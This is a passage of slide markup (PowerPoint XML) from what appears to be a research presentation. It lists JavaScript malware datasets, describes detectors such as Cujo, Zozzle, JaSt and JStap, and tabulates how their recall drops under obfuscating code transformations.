                        </a:rPr>
                        <a:t>JS150k</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"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r" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>149,677</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000"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295975">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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Malicious</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>VirusTotal</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>2,674</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="295975">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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Hynek Petrak</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>39,450</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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3"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="295975">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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>GeeksOnSecurity</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="r" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buSzPts val="2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>1,375</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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4"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="295975">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Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Total Malicious</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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2000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en" sz="2000" u="none" strike="noStrike" cap="none" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>43,499</a:t>
                      </a:r>
                      <a:endParaRPr sz="2000" u="none" strike="noStrike" cap="none" dirty="0">
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91450" marR="91450" marT="45725" marB="45725" anchor="ct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59" name="Google Shape;859;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71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="714508"/>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Web-Based Malware Detectors</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="865" name="Google Shape;865;p71"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1066800"/>
            <a:ext cx="8298900" cy="3749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sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Cujo: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>lexical analysis on tokens of JavaScript files</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Zozzle: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>syntactic analysis of JavaScript ASTs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>JaSt: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>syntactic analysis on n-grams of JavaScript ASTs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>JStap: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>syntactic, control-flow, and data-flow analysis using two modes: n-grams (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>NGrams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> mode) and identifier values (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> mode) </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Focus on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>reduction in recall rates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="866" name="Google Shape;866;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72"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="182880"/>
            <a:ext cx="8520600" cy="714508"/>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Effectiveness in Evading Detection</a:t>
            </a:r>
            <a:endParaRPr sz="3200" b="1">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="872" name="Google Shape;872;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47</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="873" name="Google Shape;873;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1464733" y="1699682"/>
            <a:ext cx="5943600" cy="2971800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="874" name="Google Shape;874;p72"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2309279" y="1193660"/>
            <a:ext cx="4953000" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2200"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="7986CB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Baseline recall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>vs.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="0C5ADB"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2200" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="E57373"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>obfuscated recall </a:t>
            </a:r>
            <a:endParaRPr sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none">
              <a:solidFill>
                <a:srgbClr val="E57373"/>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73"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314152" y="9144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400" b="1">
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Recall of Malware Detectors</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="880" name="Google Shape;880;p73"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="117986" y="640080"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:noFill/>
                <a:tableStyleId>{19842F14-65A5-4413-9061-7BFCEAB78F2E}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1944725">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1332125">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1409925">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1400200">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1342625">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1468600">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="249075">
                <a:tc>
                  <a:txBody>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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Technique</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Cujo</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>Zozzle</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JaSt</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JStap (NGrams)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1"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alibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>JStap (Values)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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512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Baseline: No transformation</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0.98 (5,548/5,649) </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0.66 (3,598/5,453) </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0.99 (5,076/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400"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0.99 (4,483/4,524)</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0.98 (4,439/4,524)</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49075">
                <a:tc gridSpan="6">
                  <a:txBody>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Individual transformations:</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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T1-StringLiteral</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.61 (1,623/2,644)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.62 (3,387/5,453)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0.66 (3,393/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0.36 (1,539/4,257)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="0"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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.43 (1,839/4,257) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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3"/>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T2-ArrayInitialization</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0.94 (4,050/4,292)</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0.66 (3,593/5,450)</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0.85 (4,360/5,105)</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0.86 (3,890/4,505)</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0.89 (4,009/4,505)</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4"/>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T3-FunctionName</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0.67 (2,780/4,159)</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0.65 (3,550/5,453)</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0.69 (3,512/5,108)</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0.57 (2,747/4,810)</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0.72 (3,463/4,810)</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5"/>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T4-CallExpression(a)</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0.71 (3,040/4,285)</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0.64 (3,507/5,453)</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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.38 (1,943/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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0.37 (1,723/4,633)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0.78 (3,613/4,633)</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6"/>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T4-CallExpression(b)</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0.82 (3,385/4,115)</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0.63 (3,424/5,453)</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0.44 (2,253/5,108)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:ea typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                          <a:sym typeface="Calibri"/>
                        </a:rPr>
                        <a:t>0.23 (1,058/4,586)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="FF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0.73 (3,369/4,586) </a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="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7"/>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T5-IfStatement</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0.82 (3,513/4,301)</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0.64 (3,505/5,453)</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0.89 (4,535/5,108)</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0.83 (3,717/4,501)</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0.93 (4,178/4,501)</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8"/>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T6-ForStatement</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0.90 (3,877/4,299)</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0.66 (3,578/5,453)</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0.92 (4,720/5,108)</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0.87 (3,872/4,465)</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0.98 (4,360/4,465)</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9"/>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T7-WhileStatement</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" u="none" strike="noStrike" cap="none"/>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0.90 (3,904/4,321)</a:t>
                      </a:r>
                      <a:endParaRPr sz="1100" b="0" i="0" u="none" strike="noStrike" cap="none">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Calibri"/>
                        <a:ea typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                        <a:sym typeface="Calibri"/>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0.66 (3,598/5,453)</a:t>
                      </a:r>
